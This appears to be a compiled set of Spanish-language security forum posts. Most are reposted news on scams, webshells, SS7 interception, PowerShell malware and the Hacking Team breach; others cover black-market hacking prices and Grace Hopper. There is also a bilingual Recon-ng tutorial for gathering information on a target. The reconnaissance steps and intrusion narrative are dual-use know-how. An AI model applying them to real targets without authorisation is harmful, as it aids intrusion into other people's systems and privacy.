Switch01(config-if)# switchport port-security mac-address sticky [DIRECCION-MAC]

Podemos comprobar el estado de Port-Security:

Switch01# show port-security

Para la monitorización del estado de los puertos:

Switch01# show port-security interface [INTERFAZ]

Un saludo, HATI 

Saludos,


Hace poco leí una noticia sobre este vpn gratuito, y me interesó. He buscado información y casi todo lo que he visto han sido cosas buenas.

Web oficial: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

¿Alguien que lo haya usado me puede decir si es tan bueno como la propaganda que tiene?

Gracias, hati.

Crece el temor a que se repita un caso similar al que sacudió a todo el mundo con el cierre del servicio de alojamiento online Megaupload. El responsable de ese servicio lanzó años más tarde Mega y ahora teme por su futuro. Por ello, ha comenzado a pedir a los usuarios de esta plataforma que empiecen a descargar sus archivos alojados en la misma por lo que pueda llegar a ocurrir con ellos.

En 2012 se terminó con Megaupload, un monstruo de Internet que utilizaban a diario millones de personas para compartir archivos. Varias redadas coordinas entre Estados Unidos y Nueva Zelanda pusieron en jaque a su responsable, Kim Dotcom, en un caso que todavía no se ha resuelto al 100% desde el punto de vista judicial.


Un poco más tarde, Dotcom anunció el lanzamiento de Mega, otro servicio online de alojamiento de archivos que apostaba por ofrecer la máxima seguridad y un buen puñado de gigas de forma gratuita. No tardó en atraer las miradas de los gobiernos y entidades gestoras de derechos de autor y ya en 2014 lo calificaron como "el paraíso de los piratas".

Todo esto trajo consecuencias nefastas para el portal. Por ejemplo, el Gobierno de Estados Unidos forzó a PayPal a dejar de procesar los pagos de los usuarios de Mega, haciendo un tremendo daño a Dotcom y demás responsables de la web. También tuvieron problemas para salir a bolsa en 2015.

Aunque Kim Dotcom ya no es el director de Mega, ha lanzado un curioso aviso a través de la red social Twitter. "Mega ha sobrevivido durante dos años sin poder procesar un solo pago con tarjeta de crédito. El ambiente se está enrareciendo. Guarda tus ficheros alojados en Mega". A continuación os dejamos el mensaje:



Kim Dotcom teme los problemas que puede tener la plataforma al permanecer bajo el control de Bill Liu. A este ciudadano chino se le ha concedido la nacionalidad en Nueva Zelanda pese a estar en la lista de los 100 criminales chinos de los que se pide la extradición. Con otro mensaje vuelve a dejar claros sus temores:


Complicada situación y difícil saber lo que en realidad está sucediendo. Como se suele decir "cuando el río suena, agua lleva". Además y siempre por si acaso, os recomendamos que descarguéis vuestros archivos alojados en Mega por lo que pueda llegar a ocurrir.


Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

La tecnología ayuda a las personas a mejorar su calidad de vida y aumenta el potencial del cuerpo humano para llevar a cabo cualquier tipo de tarea. El desarrollo de productos de robóticas para mejorar las capacidades humanas es una industria al alza que ahora recibe un nuevo impulso con la creación de la empresa Superflex, una escisión de SRI International que se centrará en la creación de exoesqueletos y accesorios que servirá entre otras cosas para que personas con problemas de movilidad recuperen sus funciones motoras.

Las prótesis ortopédicas han ayudado a personas discapacitadas a cubrir las carencias que tienen debido a problemas de salud o lesiones sufridas. Con el tiempo, el uso de dispositivos tecnológicos y componentes robóticos han contribuido para reducir la diferencia con respecto a una persona totalmente sana, así como han ayudado a explorar los verdaderos límites del ser humano cuando tiene tecnología que le asiste.

Con esa premisa ha nacido Superflex, nombre que también recibe su principal producto, un traje completo que se adapta al cuerpo humano con el objetivo de potenciar nuestros movimientos, fuerza y acciones. Este traje lleva varios años de desarrollo detrás, y su aplicación está pensando tanto para personas con problemas físicos, como también para la asistencia en tareas y trabajos de gran desgaste para nuestros huesos y músculos.

No obstante, desde esta compañía se asume el reto desde la prudencia y a pesar de las posibilidades reales que podría tener su creación, el objetivo a más corto plazo es crear un accesorio comercial que pueda hacer que personas mayores o con minusvalías pueden caminar de manera normal "ocultando" este traje bajo la ropa corriente que visten todos los días.


Los retos de SRI: trajes de superhombre y robots humanoides

Manish Kothari, directivo de SRI, cree que ahora es un buen momento para emprender un nuevo viaje con este tipo de tecnologías, debido principalmente a que los costes de producción han sido reducidos drásticamente. Además del traje Superflex, SRI se encuentra inmersa en el desarrollo de otros productos tecnológicos avanzados, el más interesante de ellos es PROXI, un robot humanoide con el que pretende dar un paso más en el campo de la robótica.

Desde luego experiencia no le va a faltar ya que una división de SRI comprada por Apple fue responsable de la inteligencia artificial Siri, el asistente virtual presente en los dispositivos de Apple que ha logrado introducir la interacción directa con los usuarios de teléfonos iPhone y el resto de productos de la compañía de Cupertino.


Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

WhatsApp es, indiscutiblemente, el cliente de mensajería instantánea más utilizado en todo el mundo. Cada día, millones de usuarios envían a través de la plataforma miles de millones de mensajes en todo el mundo, sin embargo, no todos estos mensajes se mandan con la misma intención. Como ocurre siempre que algo tiene éxito en la red, piratas informáticos y usuarios malintencionados buscan cómo sacar provecho de ello y, cómo no, WhatsApp es una de las plataformas que mayor número de estafas está registrando en los últimos meses.


Debido a su gran número de usuarios, el número de víctimas de estas estafas es bastante elevada, sin embargo, es complicado dar una cifra exacta de ellas ya que, aunque WhatsApp suele controlar su red para evitar que los bots puedan expandirse sin control, en el poco tiempo que una estafa puede estar activa, el alcance de la misma puede ser muy grande, incluso llegar a hacerse viral.

Los piratas informáticos suelen utilizar campañas en nombre de empresas de cierto prestigio como El Corte Inglés, Zara, Amazon o Starbucks para engañar al mayor número de usuarios posibles con falsos regalos o falsas promociones de manera que consigan robar los datos personales de los usuarios, dar de alta su número de número de SMS Premium o, en el peor de los casos, infectar sus ordenadores o dispositivos móviles con malware.

Para hacerse una idea del alcance de estas estafas, la empresa de seguridad ESET tomó el control de una campaña maliciosa que llegó a sus laboratorios pudiendo descubrir que, en menos de 12 horas, más de 2000 usuarios habían pulsando en el enlace que, en dicha campaña, estaba relacionado con las videollamadas de WhatsApp.

Como podemos ver, este tipo de gancho no es algo nuevo, sino que ya hemos podido ver anteriormente numerosas campañas similares. Analizando las estadísticas de distribución de la campaña, cada hora, más de 170 personas han pulsado en el enlace comprometiendo su seguridad y su privacidad, o lo que es lo mismo, 3 personas por minuto acceden a este tipo de campañas maliciosas.


España, el segundo país más afectado por esta campaña de estafa de WhatsApp

Cada campaña maliciosa está pensada para infectar a una región y a un grupo de usuarios concretos. En este caso, esta campaña estaba especialmente pensada para infectar a usuarios de habla española. Casi el 40% de los usuarios que han accedido al enlace de la campaña maliciosa lo han hecho desde Colombia, seguido, en segundo lugar, por el 16% de los usuarios que lo han hecho desde España y, en tercer lugar, desde México.

Aunque las compañías suelen detectar y mitigar estas campañas en sus primeras horas de vida, algunas veces suelen permanecer días activas buscando conseguir engañar al mayor número de usuarios posible. Para evitar ser una de las víctimas de estos piratas informáticos, lo mejor es aprender a identificarlas y evitarlas, por ejemplo, teniendo en cuenta que ninguna compañía va a regalar vales de descuento ni a través de las redes sociales ni de WhatsApp y, si nos ofrecen activar un servicio, como en este caso las videollamadas, buscar en Google información para saber si estas son ciertas o, de lo contrario, pueden tratarse de una estafa.

Fuente: WeLiveSecurity

Según Cisco Systems, más de tres millones de servidores accesibles a través de Internet están en riesgo de ser infectados por ransomware, el malware que cifra ficheros para luego pedir el pago de un rescate si la víctima quiere restaurarlos.

En el No tienes permitido ver los links. Registrarse o Entrar a mi cuenta sobre este tema, la compañía dice que unos 2.100 de esos servidores pueden ser comprometidos a través de sus webshells, que dan la oportunidad a los atacantes de tener un control persistente sobre los ordenadores, permitiéndoles infectarlos en cualquier momento. Esos servidores comprometidos están conectados a unas 1.600 IP diferentes que abarcan colegios, gobiernos, compañías de aviación y otros tipos de organizaciones que tendrían que tener un control más riguroso de la seguridad de sus servidores.

Algunos de los servidores relacionados con colegios de distrito estaban ejecutando una versión vulnerable de un Sistema de Gestión de Destino con el fin de hacer un seguimiento de los libros de la biblioteca y de otros elementos pertenecientes al centro. Cisco avisó al desarrollador Follet Learning para avisarle sobre este problema, respondiendo esta última que ya han actualizado su software para corregir una vulnerabilidad. La misma desarrolladora también ha comentado a Cisco que ha actualizado su aplicación para hallar signos de infección en las computadoras y eliminar toda puerta trasera encontrada.


El origen de todos estos problemas de seguridad está en una versión sin actualizar de JBoss, el servidor de aplicaciones Java EE desarrollado por Red Hat. Los investigadores de Cisco consiguieron identificar unos 2 millones de servidores vulnerables, mientras que en la entrada de su blog corporativo avisa de la existencia de unos 3 millones de servidores potencialmente susceptibles de ser infectados. Esto indica que la amenaza, lejos de quedarse ahí, podría ir a peor.

Desde Cisco alertan que en caso de haber una webshell en el servidor, lo suyo es tomar las medidas necesarias para evitar problemas, empezando por eliminar cualquier acceso externo al servidor con el fin de evitar intrusiones, recrear la imagen del servidor e instalar versiones actualizadas de las aplicaciones utilizadas en este. En caso de no poder reinstalar el servidor desde cero por culpa de una infección por malware, lo recomendable es restaurar un backup que funcione correctamente e instalar las actualizaciones disponibles una vez se haya restaurado el servidor.

Apple siempre tiene la cabeza bien alta en lo que a seguridad informática se refiere con iOS, su tremenda lucha contra el FBI y los medios gubernamentales de norteamérica que pretendían incluir pasillos al espionaje en todos los dispositivos de la manzana, han dado buena fe de que en Apple están tomándose muy en serio la privacidad de los usuarios. Pero cuanta más tranquilidad quieres aparentar, más "hackers" quieren demostrarte lo equivocado que estás. Así pues, un hacker alemán ha hecho pública la posibilidad de espiar llamadas y SMS recibidas a un iPhone, incluida una que realizó con el propio Presidente de los Estados Unidos de América.

Esta vulnerabilidad se basa en la red móvil y les basta con saber su número de teléfono para explotarla. El popular programa 60 Minutos invitó a los piratas informáticos para que demostraran sus capacidades y aportar veracidad a sus palabras, y estos por supuesto aceptaron. Los hackers reprodujeron las llamadas que habían grabado o interceptado a través de los iPhone demostrando que tenían absolutamente toda la razón.

Para ello explotaron una vulnerabilidad en el SS7, para quien no lo conozca, es la base del sistema de telefonía móvil en todo el mundo. Las compañías telefónicas usan el sistema SS7 para intercambiar la información de facturación de las líneas móviles, por lo que miles de millones de llamadas y mensajes de texto viajan a  diario a través de sus arterias.




Karsten Kohl es el atrevido hacker alemán, tiene un doctorado en ingeniería informática por la Universidad de Virginia. Ha llevado a cabo una demostración en una conferencia en la capital alemana de Berlín, consiguiendo grabar las llamadas del iPhone e incluso localizarlo a pesar de tener el GPS desactivado. Ha comunicado que el Presidente de los Estados Unidos de América le llamó a su teléfono el pasado año y pudo interceptar la llamada, realmente preocupante.


Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Según un estudio de la compañía de seguridad Carbon Black, cada vez se está detectando más cantidad de malware creado gracias a Microsoft PowerShell, ya que últimamente se ha convertido en una de las herramientas más populares para la codificación y mejora de malware. Además, la detección de este tipo de software malicioso es casi imposible.

Carbon Black ha detectado, gracias al análisis de más de 1.100 investigaciones por separado de 20 empresas de seguridad, que PowerShell se utilizó en el 38% de los ataques que se analizaron. Asimismo, en el 31% de los casos de todos los ataques en donde se encontraron rastros de PowerShell los usuarios no recibieron  ninguna advertencia sobre los ataques en curso, lo que confirma la dificultad para detectarlos.

El problema con PowerShell es que al ser una tecnología ubicua dentro del ecosistema del Windows, su detección es imposible ya que no se conoce un método para distinguir entre el código fuente benigno y el malicioso de PowerShell. Además, kits de herramientas como PowerSploit, PowerShell Empire, p0wnedShell, y el kit de herramientas de Social-Engineer están haciendo que sea más fácil de usar.


Bloquear PowerShell no es práctico

Es un problema que no tiene una solución sencilla. Bloquear PowerShell no es una opción, al menos de momento. "A diferencia de otras tecnologías comunes, tales como Java y Adobe Flash, que los administradores de TI pueden eliminar más fácilmente o prohibir, muchas organizaciones y aplicaciones dependen de PowerShell para administrar sus sistemas críticos", afirman los analistas de Carbon Black. Por todo ello, bloquear PowerShell podría provocar muchos más problemas que los que hay actualmente con el malware. En este caso, la solución es mucho peor que la enfermedad.

En este momento estamos ante un problema complejo que se debería solucionar cuanto antes. Hay que tener en cuenta que el 87% de estos ataques tienen que ver con software malicioso común como el ramsomware o los clics fraudulentos de muchas webs. Es decir, en la gran mayoría de casos estos ataques no están dirigidos contra nadie en concreto. Es lo que se llama shotgun approach malware, o malware de acercamiento de escopeta. De hecho, la mitad de estos ataques estaban relacionados con Vawtrack, un troyano bancario que utiliza PowerShell en su código fuente.

Veremos cómo se acaba solucionando el problema, aunque como decimos es bastante complicado, así como preocupante, que un software creado por Microsoft sea la base de muchos de los virus que circulan por la red.

Fuente: CarbonBlack

Ocho meses después de haber hackeado los servidores de Hacking Team, la empresa que vendía spyware a gobiernos de todo el mundo (incluyendo el de España), el responsable de la filtración, Phineas Fisher, desvela cómo consiguió la información.


En julio del año pasado la empresa Hacking Team fue, valga la redundancia, hackeada. Para quienes desconozcan el caso o a qué se dedica esta compañía, podemos decir que sus principales beneficios vienen de vender software de vigilancia. Entre sus principales clientes podemos contar distintos organismos gubernamentales —también españoles—, lo que se extrajo de un ataque en el que se filtraron casi 400 GB de documentos que contenían toda su base de datos. Entre toda la información que se filtró también se contenía el código fuente de su sistema de vigilancia, así como los certificados de renovación y caducidad de los clientes de la empresa.

Como es lógico, esta brecha en los sistemas de seguridad de una de las empresas más despreciadas de todo Internet ocupó titulares en todas partes. Corrieron ríos de tinta con respecto a esto, con la única certeza de que el ataque había venido desde fuera. Lo que no se sabía era quién era este atacante o cómo lo había hecho. Ahora ya sabemos la respuesta a las dos cosas.


Phineas Fisher, el alias del hacker

Según podemos leer en Motherboard, después de ocho meses de silencio la persona tras el hack ha salido del anonimato y ha publicado una explicación detallada de cómo consiguió colarse en los sistemas de la empresa.

Esta guía se puede consultar en Pastebin y ha sido escrita por alguien que se hace llamar Phineas Fisher. El documento no sirve sólo como una explicación detallada de lo que hizo, sino que, según se recoge, también sirve para poner de manifiesto su ideología y los motivos que le llevaron a realizar el hack. Podemos leer esto al final de la guía: Y esto es todo lo que hace falta para derribar una empresa y detener sus abusos contra los derechos humanos. Esa es la belleza y la asimetría del hacking: con solo 100 horas de trabajo, una persona puede deshacer años de trabajo multimillonario. El hacking ofrece a los desfavorecidos una oportunidad de luchar y ganar.

Fisher comentó que filtrar documentos que muestren la corrupción y el abuso de poderes es "hacking ético auténtico", y no el trabajar para empresas que normalmente son las que deberían ser hackeadas. Este hacker ve a "Vincenzetti, su empresa y sus amigos de la policía, los militares y los gobiernos" como parte de una larga tradición de fascistas italianos". Según se recoge en WikiLeaks, Vincenzetti firma sus emails con el lema fascista Boia chi molla, algo que podríamos contextualizar como "traidor quien ceda".

Detrás de la identidad de Phineas Fisher podría esconderse alguien de habla hispana. Según Motherboard el tal Fisher ha seguido escribiendo en español, y además nos hemos encontrado con este tuit:


El año pasado Fisher consiguió entrar en los servidores de Hacking Team, sin ser detectado durante semanas. Su intrusión culminó a primeros de julio, cuando se produjo la filtración de todos los archivos confidenciales de la empresa,destapando todos sus secretos incluyendo su lista de clientes.

La noche en la que el hacker publicó los datos, reveló que era la misma persona que consiguió entrar en Gamma International en 2014. Esta empresa es competencia de Hacking Team y es la responsable de un spyware llamado FinFisher. Sin embargo, todavía quedaba por saber cómo una sola persona había conseguido avergonzar y ridiculizar a una empresa que se dedicaba a hackear a otros.

Ocho meses después del ataque Hacking Team sigue en activo. Por eso mismo Phineas Fisher ha publicado la guía detallando cómo lo consiguió. Lo ha planteado como una nueva humillación contra la empresa, y hay datos en ella que efectivamente los dejan en ridículo.



Cómo Phineas Fisher hackeó Hacking Team

Fisher puso un pie en la puerta a través de un bug de día cero. Este tipo de vulnerabilidades pasan por alto a los especialistas en seguridad de la empresa y a sus usuarios, por lo que no han sido parcheados. Según se recoge, el fallo todavía no ha sido parcheado. El hacker tampoco ha ofrecido ningún detalle con respecto a cómo encontró esta vulnerabilidad ni qué es exactamente.

Los pasos de Fisher por la red de Hacking Team fueron muy cautos. Empezó descargando correos electrónicos, para después ir consiguiendo acceso a otros servidores y partes de la red. Lo siguiente fue conseguir privilegios administrativos dentro de la red principal de la empresa, que utiliza como sistema operativo Windows. Después se dedicó a espiar a los administradores del sistema, con una atención especial a Christian Pozzi, ya que normalmente siempre tienen acceso a toda la red. A través de un keylogger consiguió las contraseñas de Pozzi registrando sus pulsaciones en el teclado, que después utilizó para acceder y filtrar toda la información sobre Hacking Team. Como ya se ha comentado, esto también incluye el código fuente de su software de vigilancia, que estaba alojado en una red aislada.

Después de esto, Fisher entró en la cuenta de Twitter de la empresa usando la función de "contraseña olvidada", y durante la tarde/noche del 5 de julio anunció elhack a través de la cuenta oficial de Hacking Team. La cuenta de Twitter de Hacking Team, por cierto, lleva sin publicaciones nuevas desde el 8 de julio de 2015. Los rastros del paso de Fisher por ella han sido eliminados.


La veracidad del hack es difícil de determinar

Según se recoge, verificar si los detalles de la guía son ciertos es prácticamente imposible. A esto se añade que ni Hacking Team, ni las autoridades italianas han revelado nada que tenga que ver con el ataque. La investigación policial sigue su curso, y Phineas Fisher no parece preocupado por que puedan pillarle. Considerando que todavía soy libre, tengo dudas de su efectividad. (Phineas Fisher)

La guía concluye con una dirección de correo electrónico segura, que cualquiera puede utilizar para, literalmente, enviar "zero days, intentos de phishing, amenazas de muerte en italiano, acceso a cuentas bancarias, empresas, gobiernos, etc". Ya se ha enviado amenazas de muerte en otras ocasiones a personas que han habilitado unmirror con los datos robados a Hacking Team:

Veremos cómo se desarrollan los acontecimientos a partir de ahora. La guía ha servido para arrojar luz sobre ciertos aspectos específicos del ataque a Hacking Team, y habrá que estar al tanto por si la empresa reacciona a esta publicación de alguna manera.


Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Debido a la gran repercusión que han tenido las noticias sobre este caso, creo que puede ser interesante escuchar (leer en este caso  ) las opiniones de los demás respecto al tema, ya que ha levantado bastante polémica.

Todo comenzó con el famoso Iphone del terrorista de San Bernandino y la petición del FBI hacía Apple, en la que se pide modificar el software para poder acceder al teléfono.

Apple responde, dice que no cooperará, y sus motivos son la integridad y seguridad de sus datos y la posible explotación de estos que se puede llevar a cabo en un futuro.

CitarNo se puede tener una puerta trasera sólo para los buenos. Cualquier puerta trasera también podría ser explotada por los malos

Esto generá un debate, y como es normal, ante esta situación, las diferentes empresas relacionadas aportan su opinión, entre ellos están No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, o No tienes permitido ver los links. Registrarse o Entrar a mi cuenta. Tras este revuelo, No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Noticias relacionadas:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta




Aparte de la encuesta, os animo a que escribáis lo que pensáis al respecto.

Saludos, hati.

You can read this post on Spanish language:No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Recon-ng is a Python framework focused on gathering information, it can obtain a lot of data from a target and his environment. It have differente and independent modules, and you can combine the results obtained for more efficiency. Definetly, Recon-ng is a powerful tool for gathering information fast on the web.

Basics uses and modules:


# Start menu:

recon-ng

# Help

help

Recon-ng lets you create profiles for analyze different objectives without mixing information, that is stored for later reference, something very useful.
# Create profile

workspaces add <perfil>

add domains <domain>

show domains

We can see the different modules of Recon-ng, the modules are clasiffied in different sections (Discovery, Exploitation, Import, Recon y Reporting).
# Show modules

show modules

We can search modules by name:

SEARCH <module>

When we know which module we will use, we must load it (i will use netcraft for the example). There are two commands for do this:
# Select module

use <module>
load <module>

With the module loaded, we can see information abaut it and his options.

show info

If we have not created a profile, we can select our "target"

set SOURCE <domain>

# Start module

run

There are a lot of different modules, they bring us great variety of ways to find information of a specific target, we can even use social networks like Twitter or analyze domains looking for ssl vulnerabilities. The results can be displayed in different tables, as "contacts", "companies", "hosts" ...

show <lista>

Spanish post:No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Official web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Regards, hati 

Puedes leer este post en inglés:No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Recon-ng es un framework escrito en Python enfocado exclusivamente en la recolección de información, puede conseguir gran cantidad de datos sobre un objetivo y su entorno. Para su uso, cuenta con diferentes módulos independientes, pudiéndose combinar los resultados obtenidos con ellos para lograr mayor efectividad. En definitiva, Recon-ng proporciona un poderoso entorno en el cual se puede realizar reconocimiento open source basado en web de manera rápida y total.

Veamos el uso básico de esta herramienta y como utilizar sus módulos:


# Menú inicial:

recon-ng

# Ayuda

help

Recon-ng nos permite crear perfiles para realizar análisis a diferentes objetivos sin mezclar la información, que queda almacenada para suposterior consulta, algo de mucha utilidad.
# Crear perfil

workspaces add <perfil>

add domains <dominio>

show domains

Podemos ver los diferentes módulos que trae Recon-ng, que se clasifican en Discovery, Explotation, Import, Recon y Reporting.
# Ver módulos

show modules

También podemos buscar módulos por su nombre:

SEARCH <módulo>

Cuando tengamos pensado que módulo usar, debemos cargarlo (para el ejemplo usaré netcraft). Para ello hay dos comandos:
# Seleccionar módulo

use <módulo>
load <módulo>

Con el módulo en uso, podemos ver información sobre que hace y sus opciones.

show info

Como anteriormente hemos creado un perfil, no hace falta especificar nuestro objetivo. En caso de no haber creado un perfil, podemos seleccionar nuestro "target" especificando un valor a SOURCE.

set SOURCE <dominio>

Con el módulo seleccionado y configurado, solo nos queda lanzarlo.
# Iniciar módulo

run

Existen muchos módulos diferentes, que nos aportan gran diversidad de medios para buscar información sobre un objetivo específico, incluso podemos usar las redes sociales como Twitter o analizar dominios en busca de vulnerabilidades ssl. Los resultados obtenidos se pueden visualizar en diferentes tablas, como "contacts", "companies", "hosts"...

show <lista>

Post en inglés:No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Página oficial: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Saludos, hati 

El avance de nuevas tecnologías ha hecho que cada día haya más dispositivos conectados y que cuenten con novedosas características. Algunas de estas tecnologías y otras más específicas han ido llegando a otros sectores como es el caso de la automoción, y es que los coches de hoy en día cuentan con mucha tecnología. Los sistemas inteligentes de frenado, sensores de proximidad, asistencia al aparcamiento, sistemas de entretenimiento o incluso la conducción autónoma son algunos de ellos.


Sin duda, unos sistemas o tecnologías que llegan hasta los coches para aportar una mayor seguridad pero que al igual que los sistemas informáticos, los dispositivos móviles u otros dispositivos conectados están en riesgo de ser atacados por hackers. Algo que ya vimos como era posible después de que dos hacker consiguieran acceder a las unidades de control electrónico (ECU) con las que cuentan los coches, y consiguieran detener por control remoto varios modelos.


Es por eso que Karamba Security, una startup con sede en Michigan, se haya puesto manos a la obra para desarrollar una tecnología anti-malware para los sistemas electrónicos de los coches y que acaba de ser presentada hoy mismo.

El desarrollo de esta tecnología se basa en proteger la red local o Controller Area Network (CAN) que forman la gran cantidad de unidades de control electrónico que se comunican entre sí para controlar los distintos sistemas de un coche hoy en día. Además, el hecho de que la gran mayoría de coches ya cuenten con tecnologías como Bluetooth o acceso a Internet, hace que para los hackers sea más fácil llegar hasta las entrañas de los mismos para conseguir su control remoto.

Partiendo de esta base, No tienes permitido ver los links. Registrarse o Entrar a mi cuenta ha desarrollado un software anti-malware para los coches que puede ser instalado desde fábrica y que protege el acceso de cualquier hacker a esta red formada por las distintas unidades de control electrónico para que no puedan ser controladas de forma remota y provocar que el conductor pierda el control del vehículo.

Este software lo que hace es crear una lista blanca de todos los procesos o comandos que el fabricante envía sobre las ECU del vehículo para bloquear cualquier otro comando o proceso que llegue desde otro origen. De esta manera, cualquier instrucción enviada a una de las unidades de control electrónico del coche que no vengan del fabricante y estén definidas en esa lista blanca será bloqueada inmediatamente. De esta manera, se pretende evitar que nadie con malas intenciones pueda tomar el control de un coche de forma remota.

El mercado negro de datos robados mueve millones de euros todos los años como ya hemos visto en alguna ocasión con el precio al que se vende la información sobre tarjetas de crédito o cuentas bancarias. Ahora conocemos un estudio que nos muestra lo que nos costaría que alguien nos consiguiera acceso a una cuenta de Facebook, Gmail o Hotmail, concretamente, el precio es de 129 euros.


Los cibercriminales que se mueven en el mercado negro lo hacen por lo lucrativo de "este negocio". Una cuenta de una red social, de un juego online, una tarjeta de crédito... todos estos conceptos son un ingreso potencial para ellos. El reciente informe de Dell Secureworks titulado "Underground Hacker Markets" No tienes permitido ver los links. Registrarse o Entrar a mi cuenta nos muestra, entre otras cosas, el precio que nos van a pedir por hackear servicios y productos.

El precio por acceder a las cuentas de email más populares de servicios como Gmail, Hotmail o Yahoo tiene un coste de 129 euros el mismo que nos van a cobrar por acceder a una cuenta de Facebook. Además, en todos los casos prometen resultados rápidos, confidencialidad total e incluso servicio post venta.

Pero ahí no termina la cosa. También ofrecen la posibilidad de acceder a una cuenta corporativa de una empresa, cuyo coste sería de 500 euros por buzón de entrada en este caso. Incluso podremos pedirles que nos enseñen como hacerlo. Un tutorial nos costará entre 20 y 40 euros dependiendo de su contenido.

En el informe también se habla de precio de las tarjetas de crédito robadas. Una VISA o MasterCard de Estados Unidos nos puede costar unos 7 euros aunque si queremos que tenga toda la información necesaria para poder usarla el precio puede llegar a los 80 euros. La lista de precios sigue con conceptos como la IP de un usuario y su ordenador por 90 euros e incluso pasaportes que pueden llegar a costarnos 3.000 euros.

Y para terminar tenemos los ataques DDoS que tan de moda se han puesto en los últimos tiempos. Los precios actuales fluctúan entre 5 y 10 euros por hora, 30 y 55 euros por día o entre 200 y 555 euros por semana dependiendo del tiempo que queramos que dure el ataque.

Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta fue la primera persona que pensó en darle un uso humano a las tecnologías de la computación, creo el lenguaje de programación COBOL y describió el primer error "bug"



El mundo de los hackers parece haber estado reservado desde hace muchos años por los hombres. Es más, la mayor parte de los rostros conocidos de este mundo están copados por caras masculinas. Sin embargo, Grace Hopper murió dejando un legado imprescindible para cualquier hacker.

Su pensamiento le valió el apelativo de 'pionera'. Hopper fue la primera persona que se planteó que las computadoras no solamente tenían utilidad para los fines bélicos, sino que podrían tener importantes implicaciones para la humanidad. Una reflexión relacionada con el servicio a las personas que permeabilizará en la ética hacker, entre las décadas de los 60 y los 70.

Hopper se doctoró en Matemáticas en Yale y trabajó como profesora universitaria. Al estallar la II Guerra Mundial, consiguió entrar en la Marina. No cumplía las condiciones físicas, pero su conocimiento en matemáticas fue considerado para la causa. Así, obtuvo un permiso especial para trabajar haciendo cálculos matemáticos para saber dónde alinear la artillería. En 1944 , con el grado de teniente, participó en la programación de uno de los primeros computadores, la No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.

Sin embargo, su aportación más relevante fue la invención del lenguaje de programación No tienes permitido ver los links. Registrarse o Entrar a mi cuenta al terminar la guerra y mientras trabajaba para el fabricante de compoutadoras Univac. Hopper se propuso simplificar el lenguaje de los ordenadores, que hasta entonces solo entendían ceros y unos, y que hacían que su uso estuviese reservado a personas con conocimientos matemáticos. De ahí surgió COBOL (Common Business Oriented Language), un lenguaje que entendía instrucciones en inglés. Sin embargo, no fue su única aportación.

La descubridora del primer "bug"

En el mundo de la informática, y bien lo saben los hackers, una de las palabras más habituales es la de "bug". Se trata de un error en el software o el hardware, intencionado o no. El 9 de septiembre de 1947 Hopper, junto a Howark Aiken, se encontraba trabajando en el comportamiento extraño que estaba experimentando la computadora Mark. Decidieron examinar todos los componentes y encontraron una polilla de apenas un par de centímetros en un relé de la máquina.

Como todo el trabajo que Hopper hacía, este incidente quedó escrito en su cuaderno con la siguiente nota: "Primer caso de bicho que se encuentra". Desde entonces, el término "bug", que literalmente quiere decir "bicho", es empleado para describir estos errores informáticos.

Toda esta trayectoria le llevó a obtener numerosos premios y reconocimientos. Entre ellos, más de 40 universidades la condecoraron con el honoris causa y llegó a ganar la Medalla Wilbur Lucius Cross de Yale.

Las 'Hoppers' del futuro

Hasta ahora, las carreras relacionadas con la informática y la computación han estado copadas por estudiantes masculinos. Sin embargo, la tendencia apunta a una igualdad en la balanza. El pasado 2015 la Universidad de Stanford anunciaba que, por primera vez, sus estudios de Ingeniería Informática se habían convertido en los más populares entre sus estudiantes femeninas.

En cualquier caso, los datos de la National Science Foundation apuntan a que tan solo el 18% de las estudiantes están interesadas en carreras relacionadas con la informática. Unos datos que coinciden con los que revela la OCDE para España: ellas estudian más, pero no se interesan por este sector.

En cualquier caso, tanto Grace Hopper como Ada Lovelace -considerada como la primera programadora-  iniciaron un camino dentro de la informática que seguirán el resto de generaciones (masculinas y femeninas).


Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Me pareció bastante bueno este manual para iniciarse con la esteganografía, muy bien explicado y con buenos ejemplos, por eso quiero compartirlo.


Aqui les dejo el enlace: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Autor del manual: xionexsystem

Saludos,

Estaba escribiendo un post para la sección de Hacking, llevaba bastante tiempo en ello, y cuando le di a previsualizar, el foro estaba fuera de servicio.

Al rato el foro volvió a estar operativo, recargue la página para ver si podía recuperar el post y:

500 Internal Server Error



Reenviar




¿Hay alguna forma de recuperar el post?

Gracias de antemano. 

Hoy en día son muchos los usuarios que consumen contenido multimedia por Internet como vídeos online, tráilers de películas en alta calidad o incluso contenidos personales almacenados en nuestro ordenador. Es por eso que un gran número de personas tiene la herramienta QuickTime instalada en su equipo para reproducir todo este tipo de contenidos.


Pues bien, un informe publicado por la empresa de seguridad Trend Micro advierte que entre los planes de Apple, se encuentra el de abandonar el soporte de QuickTime en la plataforma Windows. Sin embargo, los usuarios que cuenten en sus dispositivos con el sistema operativo de Apple no deben temer porque a ellos sí seguirá dándoles soporte.

El hecho ha llamado bastante la atención, y significa que Apple dejará de proporcionar actualizaciones de seguridad para QuickTime en Windows. Además, la cosa no se queda sólo ahí, ya que también han sido reportadas dos nuevas vulnerabilidades por la Iniciativa de Día Zero dentro de la Política de Divulgación de la propia compañía de seguridad.

